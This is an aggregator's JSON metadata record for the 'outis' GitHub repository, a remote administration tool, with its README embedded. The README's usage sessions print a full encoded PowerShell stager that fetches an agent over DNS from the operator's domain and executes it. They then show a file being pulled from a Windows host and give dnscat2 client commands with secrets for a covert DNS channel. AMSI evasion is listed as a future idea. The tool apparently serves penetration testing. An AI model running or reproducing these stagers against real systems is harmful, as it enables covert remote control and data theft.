{"id":21573686,"url":"https://github.com/syss-research/outis","last_synced_at":"2025-04-10T16:06:58.539Z","repository":{"id":119357015,"uuid":"89705274","full_name":"SySS-Research/outis","owner":"SySS-Research","description":"outis is a custom Remote Administration Tool (RAT) or something like that. It was build to support various transport methods (like DNS) and platforms (like Powershell).","archived":false,"fork":false,"pushed_at":"2017-09-19T16:53:54.000Z","size":229,"stargazers_count":126,"open_issues_count":0,"forks_count":45,"subscribers_count":13,"default_branch":"master","last_synced_at":"2025-03-24T13:51:20.355Z","etag":null,"topics":["agent","dns","powershell","rat","security","security-tools","tool"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/SySS-Research.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-04-28T12:46:06.000Z","updated_at":"2025-03-05T06:59:19.000Z","dependencies_parsed_at":null,"dependency_job_id":"ab0d91a6-9842-48a0-93d0-988808741d50","html_url":"https://github.com/SySS-Research/outis","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2Foutis","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2Foutis/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2Foutis/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2Foutis/ma
nifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/SySS-Research","download_url":"https://codeload.github.com/SySS-Research/outis/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248250743,"owners_count":21072682,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["agent","dns","powershell","rat","security","security-tools","tool"],"created_at":"2024-11-24T12:07:43.475Z","updated_at":"2025-04-10T16:06:58.515Z","avatar_url":"https://github.com/SySS-Research.png","language":"Python","funding_links":[],"categories":["\u003ca id=\"9e3a9beb5ecf36b9624525bc3cfef78a\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"1da695fd3dec80b88aadb1b7c724330f\"\u003e\u003c/a\u003eWindows"],"readme":"outis\n=====\n\noutis is a custom Remote Administration Tool (RAT) or something like that. Think Meterpreter or Empire-Agent. However, the focus of this tool is neither an exploit toolkit (there are no exploits) nor persistent management of targets. The focus is to communicate between server and target system and to transfer files, share sockets, spawn shells and so on using various methods and platforms.\n\n\nOn the Name\n===========\n\nThe cyclops Polyphemus in Homer's Odyssey had some issues with name resolution. When he asked for Odysseus' name, the hacker told him it is \"Outis\" meaning \"Nobody\" in ancient Greek. 
Thus, when Polyphemus later shouted that Nobody was about to kill him, strangely no help arrived.\n\nMy thanks to Marcel for remembering this marvelous piece of classic tale.\n\n\nDependencies for the Handler\n============================\n\nArchlinux users can install the following packages:\n\n * python3 # includes cmd, tempfile, ...\n * python-progressbar2\n * python-dnspython\n * python-crypto\n * python-pyopenssl\n * and maybe more...\n\nIn other distributions the names may differ, for instance, there is a module named crypto and a module named pycrypto. We need the latter.\n\nAlso, older versions might cause problems:\n\n * pyopenssl needs to be version 16.1.0 or newer, check as follows:\n ```\n    $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)'\n ```\n\nYou can set up a python virtual environment quite easily:\n\n```\n$ virtualenv outis-venv\n$ source ./outis-venv/bin/activate\n(outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl\n```\n\nThis results in the following package list, which seems to work for me:\n\n```\n$ pip freeze\nappdirs==1.4.3\nasn1crypto==0.22.0\ncffi==1.10.0\ncryptography==1.8.1\ndnspython==1.15.0\nidna==2.5\npackaging==16.8\nprogressbar2==3.18.1\npycparser==2.17\npycrypto==2.6.1\npyOpenSSL==16.2.0\npyparsing==2.2.0\npython-utils==2.1.0\nsix==1.10.0\n```\n\n\nInstallation\n============\n\nClone this git repository with the recursive flag to also clone its submodules in the thirdpartytools folder:\n\n```\ngit clone --recursive ...\n```\n\nThe handler runs on Python 3. Install its dependencies and run it. 
It will generate stagers, agents and everything else for you.\n\nTo bind low ports without needing root privileges, consider using a capability wrapper.\n\n\nTerms\n=====\n\n * **agent**: software that runs on the victim system\n * **handler**: software that parses your commands and leads the agents (usually it runs on your server)\n * **stager**: short script that downloads the agent (using the transport module) and runs it\n * **transport**: communication channel between stager/agent and handler, e.g. ReverseTCP\n * **platform**: victim architecture to use for stager/agent scripts, e.g. PowerShell\n\n\nCurrently Supported Platforms\n=============================\n\n * PowerShell (partial)\n\n\nCurrently Supported Transports\n==============================\n\n * Reverse TCP\n * DNS (types TXT or A for staging, and types TXT, CNAME, MX, AAAA or A for agent connection)\n\n\nCurrently Supported Cryptography\n================================\n\n * Agent stages can be encoded (for obfuscation, not for security) using cyclic XOR\n * Agent stages can be authenticated using RSA signatures and pinned certificates\n * Transport connections can be encrypted / authenticated using TLS and pinned certificates\n\n\nCurrently Supported Commands and Controls\n=========================================\n\n * ping requests to test the connection (partial)\n * text message format (partial)\n * upload and download of files\n\n\nCurrently Supported Extras\n==========================\n\n * When using DNS transport with stager and powershell, you can stage the tool dnscat2 / dnscat2-powershell from the thirdpartytools directory instead of the default outis agent. 
Set the platform option AGENTTYPE to DNSCAT2 (will take a while, but uses only DNS to stage) or DNSCAT2DOWNLOADER (tries to download using HTTPS).\n\n\nUsage Examples\n==============\n\nDownload of a file using staged DNS transport with POWERSHELL platform could look like this:\n\n```raw\n$ outis\noutis\u003e set TRANSPORT DNS\noutis\u003e set ZONE zfs.sy.gs\noutis\u003e set AGENTDEBUG TRUE\noutis\u003e info\n[+] Options for the Handler:\nName               Value       Required  Description                                                      \n-----------------  ----------  --------  -----------------------------------------------------------------\nTRANSPORT          DNS         True      Communication way between agent and handler (Options: REVERSETCP,\n                                          DNS)\nCHANNELENCRYPTION  TLS         True      Encryption Protocol in the transport (Options: NONE, TLS)\nPLATFORM           POWERSHELL  True      Platform of agent code (Options: POWERSHELL)\nPROGRESSBAR        TRUE        True      Display a progressbar for uploading / downloading? 
(only if not \n                                         debugging the relevant module) (Options: TRUE, FALSE)\n\n[+] Options for the TRANSPORT module DNS:\nName       Value        Required  Description                                                             \n---------  -----------  --------  ------------------------------------------------------------------------\nZONE       zfs.sy.gs    True      DNS Zone for handling requests\nLHOST      0.0.0.0      True      Interface IP to listen on\nLPORT      53           True      UDP-Port to listen on for DNS server\nDNSTYPE    TXT          True      DNS type to use for the connection (stager only, the agent will \n                                  enumerate all supported types on its own) (Options: TXT, A)\nDNSSERVER               False     IP address of DNS server to connect for all queries\n\n[+] Options for the PLATFORM module POWERSHELL:\nName                  Value                       Required  Description                                   \n--------------------  --------------------------  --------  ----------------------------------------------\nSTAGED                TRUE                        True      Is the communication setup staged or not? \n                                                            (Options: TRUE, FALSE)\nSTAGEENCODING         TRUE                        True      Should we send the staged agent in an encoded \n                                                            form (obscurity, not for security!) 
(Options: \n                                                            TRUE, FALSE)\nSTAGEAUTHENTICATION   TRUE                        True      Should the stager verify the agent code \n                                                            before executing (RSA signature verification \n                                                            with certificate pinning) (Options: TRUE, \n                                                            FALSE)\nSTAGECERTIFICATEFILE  $TOOLPATH/data/outis.pem    False     File path of a PEM with both RSA key and \n                                                            certificate to sign and verify staged agent \n                                                            with (you can generate a selfsigned cert by \n                                                            using the script gencert.sh initially)\nAGENTTYPE             DEFAULT                     True      Defines which agent should be used (the \n                                                            default outis agent for this plattform, or \n                                                            some third party software we support) \n                                                            (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER)\nTIMEOUT               9                           True      Number of seconds to wait for each request \n                                                            (currently only supported by DNS stagers)\nRETRIES               2                           True      Retry each request for this number of times \n                                                            (currently only supported by DNS stagers)\nAGENTDEBUG            TRUE                        True      Should the agent print and log debug messages \n                                                            (Options: TRUE, FALSE)\noutis\u003e generatestager\n[+] Use the following stager code:\npowershell.exe -Enc 
JAByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAYQA9ACIAIgA7ACQAdAA9ADAAOwBmAG8AcgAoACQAaQA9ADAAOwA7\n  ACQAaQArACsAKQB7ACQAYwA9ACgAWwBzAHQAcgBpAG4AZwBdACgASQBFAFgAIAAiAG4AcwBsAG8AbwBrAHUAcAAgAC0AdAB5AHAAZQA9AFQAWA\n  BUACAALQB0AGkAbQBlAG8AdQB0AD0AOQAgAHMAJAAoACQAaQApAHIAJAAoACQAcgApAC4AegBmAHMALgBzAHkALgBnAHMALgAgACIAKQApAC4A\n  UwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQA7AGkAZgAoACEAJABjACkAewBpAGYAKAAkAHQAKwArAC0AbAB0ADIAKQB7ACQAaQAtAC0AOwBjAG\n  8AbgB0AGkAbgB1AGUAOwB9AGIAcgBlAGEAawA7AH0AJAB0AD0AMAA7ACQAYQArAD0AJABjADsAfQAkAGEAPQBbAEMAbwBuAHYAZQByAHQAXQA6\n  ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQApADsAJABiAD0AJABhAC4ATABlAG4AZwB0AGgAOwAkAGYAcAA9ACIAWA\n  B4AEkAMgArAGUAQgBoAGUAUgBMAFMATQBuAHIAVQBNAFgAbgBnAHIARABTAGQATwAyAGQAOAAwAGMAZAB2AHcAcwBKAGMAYwBGAEIAbgAvAGYA\n  LwB3AEoATwBpAEIAVAA4AGIATwA2AHAAZgBXAFgAdwBwAEUATwBQAFAAUgBsAFAAdgBnAE8AbgBlAGcAYwBpAE8AYgBPAGEAZABOAFAAVQBxAH\n  AAZgBRAD0APQAiADsAJABpAD0AMAA7ACQAYQA9ACQAYQB8ACUAewAkAF8ALQBiAFgAbwByACQAZgBwAFsAJABpACsAKwAlACQAZgBwAC4ATABl\n  AG4AZwB0AGgAXQB9ADsAJABwAGsAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAwACwANwA1ADUAKQA7ACQAcw\n  BpAGcAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAA3ADUANQAsADYAOAA0ACkAOwAkAHMAPQBOAGUAdwAtAE8A\n  YgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAxADQAMwA5ACwAKAAkAGIALQAxADQAMwA5ACkAKQA7ACQAcwBoAGEAPQBOAGUAdwAtAE\n  8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBTAEgAQQA1ADEAMgBNAGEAbgBhAGcAZQBk\n  ADsAaQBmACgAQAAoAEMAbwBtAHAAYQByAGUALQBPAGIAagBlAGMAdAAgACQAcwBoAGEALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAHAAaw\n  AuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAKQAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIA\n  aQBuAGcAKAAkAGYAcAApACkAIAAtAFMAeQBuAGMAVwBpAG4AZABvAHcAIAAwACkALgBMAGUAbgBnAHQAaAAgAC0AbgBlACAAMAApAHsAIgBFAF\n  IAUgBPAFIAMQAiADsARQB4AGkAdAAoADEAKQB9ADsAJAB4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5\n  
AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIAOwAkAHgALgBGAHIAbw\n  BtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAGsAKQA7AGkAZgAoAC0ATgBvAHQAIAAkAHgALgBWAGUAcgBpAGYAeQBEAGEAdABhACgAJABzAC4A\n  VABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAsACIAUwBIAEEANQAxADIAIgAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG\n  UANgA0AFMAdAByAGkAbgBnACgAJABzAGkAZwApACkAKQB7ACIARQBSAFIATwBSADIAIgA7AEUAeABpAHQAKAAyACkAfQA7ACIARwBPAEEARwBF\n  AE4AVAAiADsASQBFAFgAIAAkAHMAOwA=\noutis\u003e run\n[+] DNS listening on 0.0.0.0:53\n[+] Sending staged agent (34332 bytes)...\n100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16\n[+] Staging done\n[+] Waiting for connection and TLS handshake...\n[+] Initial connection with new agent started\n[+] Upgrade to TLS done\noutis session\u003e [+] AGENT: Hello from Agent\n\noutis session\u003e download C:\\testfile.txt /tmp/out.txt\n[+] initiating download of remote file C:\\testfile.txt to local file /tmp/out.txt\n[+] agent reports a size of 3295 bytes for channel 1\n100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00\n[+] wrote 3295 bytes to file /tmp/out.txt\noutis session\u003e exit\nDo you really want to exit the session and close the connection [y/N]? y\noutis\u003e exit\n```\n\nOr maybe we want to use dnscat2 for the real deal and just use outis to stage it:\n\n```raw\n$ outis\noutis\u003e set TRANSPORT DNS\noutis\u003e set AGENTTYPE DNSCAT2\noutis\u003e set ZONE zfs.sy.gs\noutis\u003e run\n[+] DNS listening on 0.0.0.0:53\n[+] Sending staged agent (406569 bytes)...\n100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17\n[+] Staging done\n[+] Starting dnscat2 to handle the real connection\n\nNew window created: 0\nNew window created: crypto-debug\nWelcome to dnscat2! 
Some documentation may be out of date.\n\nauto_attach =\u003e false\nhistory_size (for new windows) =\u003e 1000\nSecurity policy changed: All connections must be encrypted and authenticated\nNew window created: dns1\nStarting Dnscat2 DNS server on 0.0.0.0:53\n[domains = zfs.sy.gs]...\n\nAssuming you have an authoritative DNS server, you can run\nthe client anywhere with the following (--secret is optional):\n\n  ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs\n\nTo talk directly to the server without a domain name, run:\n\n  ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg==\n\nOf course, you have to figure out \u003cserver\u003e yourself! Clients\nwill connect directly on UDP port 53.\n\ndnscat2\u003e New window created: 1\nSession 1 Security: ENCRYPTED AND VERIFIED!\n(the security depends on the strength of your pre-shared secret!)\n\ndnscat2\u003e sessions\n0 :: main [active]\n  crypto-debug :: Debug window for crypto stuff [*]\n  dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*]\n  1 :: command (feynman-win7) [encrypted and verified] [*]\n  \ndnscat2\u003e session -i 1\nNew window created: 1\nhistory_size (session) =\u003e 1000\nSession 1 Security: ENCRYPTED AND VERIFIED!\n(the security depends on the strength of your pre-shared secret!)\nThis is a command session!\n\nThat means you can enter a dnscat2 command such as\n'ping'! 
For a full list of clients, try 'help'.\n\ncommand (feynman-win7) 1\u003e download c:/testfile.txt /tmp/out.txt\nAttempting to download c:/testfile.txt to /tmp/out.txt\nWrote 3295 bytes from c:/testfile.txt to /tmp/out.txt!\n\ncommand (feynman-win7) 1\u003e exit\nInput thread is over\n```\n\nInspirations\n============\n\nThis project was inspired by (and shamelessly stole part of its code from):\n\n * Empire:\n   * https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py\n     — generate_launcher uses an HTTP(S) stager\n   * https://github.com/adaptivethreat/Empire/tree/master/data/agent\n     — stager (step two after initial launcher) and agent (step three)\n   * https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py\n     — powershell script generation and stripping\n\n * Metasploit:\n   * https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb\n     — CmdStager for bourne, ...\n\n * ReflectiveDLLInjection:\n   * https://github.com/stephenfewer/ReflectiveDLLInjection\n \n * p0wnedShell:\n   * https://github.com/Cn33liz/p0wnedShell\n     — some ideas for AMSI evasion for future use\n \n * dnscat2:\n   * https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md\n     — ideas on protocol design over DNS\n   * https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1\n     — powershell version of the dnscat2 agent\n  \n * dnsftp\n   * https://github.com/breenmachine/dnsftp\n     — short script parts for stagers via DNS\n\nDisclaimer\n==========\n\nUse at your own risk. Do not use without full consent of everyone involved.\nFor educational purposes only.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsyss-research%2Foutis","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsyss-research%2Foutis","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsyss-research%2Foutis/lists"}